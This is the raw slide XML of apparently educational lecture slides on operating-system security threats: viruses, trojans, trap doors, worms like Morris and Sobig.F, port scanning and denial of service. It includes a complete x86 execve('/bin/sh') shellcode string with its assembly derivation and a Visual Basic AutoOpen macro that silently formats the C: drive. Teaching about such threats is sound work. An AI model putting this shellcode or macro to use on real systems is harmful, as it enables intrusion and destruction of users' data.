        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1240957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Null Characters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381065"/>
            <a:ext cx="3733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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  main+0x2f                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a: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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, 0x7(%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0x8(%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0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), 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$0xb,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ebx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call main+0x5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .string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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .type   main, @function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4888" y="2343090"/>
            <a:ext cx="2976512" cy="323039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24400" y="1942980"/>
            <a:ext cx="2746590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xorl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 err="1"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %al, 0x7(%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8570" y="2895600"/>
            <a:ext cx="2976512" cy="707886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24400" y="2958643"/>
            <a:ext cx="3352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 0xc(%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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx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5481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Null Characters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381065"/>
            <a:ext cx="3733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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  main+0x2f                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a: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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, 0x7(%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0x8(%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0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), 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$0xb,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ebx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call main+0x5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .string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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .type   main, @function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3886200"/>
            <a:ext cx="2976512" cy="323039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3819989"/>
            <a:ext cx="2034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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0xb, %al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146832174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Null Characters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381065"/>
            <a:ext cx="3733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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  main+0x2f                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a: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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, 0x7(%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0x8(%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0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), 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$0xb,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ebx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call main+0x5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .string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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .type   main, @function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3400" y="3886200"/>
            <a:ext cx="2976512" cy="323039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53000" y="3819989"/>
            <a:ext cx="20341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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0xb, %al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13489469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Null Characters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381065"/>
            <a:ext cx="373380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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  main+0x2f                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, 0x7(%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0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx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0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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edx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leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx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$0xb,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$0x0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x1,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 $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  call main+0x5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .type   main, @function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09600" y="4446657"/>
            <a:ext cx="2976512" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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14800" y="417247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xorl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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax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09028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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode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" y="3475167"/>
            <a:ext cx="8839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dirty="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>[] = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>  "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>  "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\x89"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>  "\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>";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0234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0763" y="155575"/>
            <a:ext cx="7666037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Program Threats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5813" y="1150938"/>
            <a:ext cx="8482012" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Viruses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Code fragment embedded in legitimate program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Self-replicating, designed to infect other computers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Very specific to CPU architecture, operating system, applications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Usually borne via email or as a macro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Visual Basic Macro to reformat hard drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sub AutoOpen()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Dim oFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	Set oFS = CreateObject(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	vs = Shell(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>c:command.com /k format c:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>,vbHide)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>End Sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="160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7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84188" y="127000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Program Threats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762000"/>
            <a:ext cx="7704138" cy="530066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Many variations, many names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Trojan Horse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Code segment that misuses its environment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Exploits mechanisms for allowing programs written by users to be executed by other users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Spyware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pop-up browser windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>,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 covert channels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Up to 80% of spam delivered by spyware-infected systems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Trap Door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Specific user identifier or password that circumvents normal security procedures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Could be included in a compiler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How to detect them?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305012723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6613" y="141288"/>
            <a:ext cx="7850187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Program Threats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123950"/>
            <a:ext cx="7559675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Virus dropper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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inserts virus onto the system</a:t>
            </a:r>
          </a:p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Many categories of viruses, literally many thousands of viruses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File / parasitic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Boot / memory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Macro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Source code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Polymorphic to avoid having a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virus signature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Encrypted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Stealth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Tunneling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Multipartite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Armored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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>
              <a:latin typeface="Helvetica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85145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787400" y="127000"/>
            <a:ext cx="78994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 Boot-sector Computer Virus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0" y="1093788"/>
            <a:ext cx="4851400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19244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76262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The Threat Continues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874713" y="1717675"/>
            <a:ext cx="7723187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Attacks still common, still occurring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Attacks moved over time from science experiments to tools of organized crime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Targeting specific companies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Creating botnets to use as tool for spam and DDOS delivery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Keystroke logger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>to grab passwords, credit card numbers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248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41288"/>
            <a:ext cx="7859712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System and Network Threats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09600"/>
            <a:ext cx="7313613" cy="4530725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Some systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> rather than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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secure by default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Reduce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attack surface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But harder to use, more knowledge needed to administer</a:t>
            </a:r>
          </a:p>
          <a:p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Network threats harder to detect, prevent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Protection systems weaker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More difficult to have a shared secret on which to base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No physical limits once system attached to internet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Or on network with system attached to internet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Even determining location of connecting system difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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IP address is only knowledge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321715148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404938" y="168275"/>
            <a:ext cx="7513637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System and Network Threats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599" y="609600"/>
            <a:ext cx="8689975" cy="4530725"/>
          </a:xfrm>
        </p:spPr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Worms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> – use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spawn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mechanism; standalone program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>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Morris Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>worm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Exploited UNIX networking features (remote access) and bugs in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> programs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Exploited trust-relationship mechanism used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>rsh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to access friendly systems without use of password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Grappling hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF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program uploaded main worm program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99 lines of C code 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Hooked system then uploaded main code, tried to attack connected systems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Also tried to break into other users accounts on local system via password guessing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target system already infected, abort, except for every 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> time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661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5213" y="155575"/>
            <a:ext cx="7621587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The Morris Internet Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 103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950" y="1255713"/>
            <a:ext cx="6500813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906525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914400" y="127000"/>
            <a:ext cx="7799388" cy="576263"/>
          </a:xfrm>
        </p:spPr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System and Network Threats (Cont.)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889000" y="1096963"/>
            <a:ext cx="6877050" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated attempt to connect to a range of ports on one or a range of IP addresses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Detection of answering service protocol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Detection of OS and version running on system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>scans all ports in a given IP range for a response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> has a database of protocols and bugs (and exploits) to apply against a system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Frequently launched from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zombie systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 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To decrease trace-ability	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3027036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982663" y="127000"/>
            <a:ext cx="7704137" cy="576263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>System and Network Threats (Cont.)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874713" y="762000"/>
            <a:ext cx="7108825" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Denial of Service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Overload the targeted computer preventing it from doing any useful work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Distributed denial-of-service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DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) come from multiple sites at once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Consider the start of the IP-connection handshake (SYN)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How many started-connections can the OS handle?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Consider traffic to a web site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How can you tell the difference between being a target and being really popular?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Accidental – CS students writing bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>fork() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>code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Purposeful – extortion, punishment</a:t>
            </a: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2701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71488" y="0"/>
            <a:ext cx="8229600" cy="576263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sobig.F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Worm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067800" cy="4976812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More modern example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Disguised as a photo uploaded to adult newsgroup via account created with stolen credit card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Targeted Windows systems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Had own SMTP engine to mail itself as attachment to everyone in infect system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s address book</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Disguised with innocuous subject lines, looking like it came from someone known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Attachment was executable program that created  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
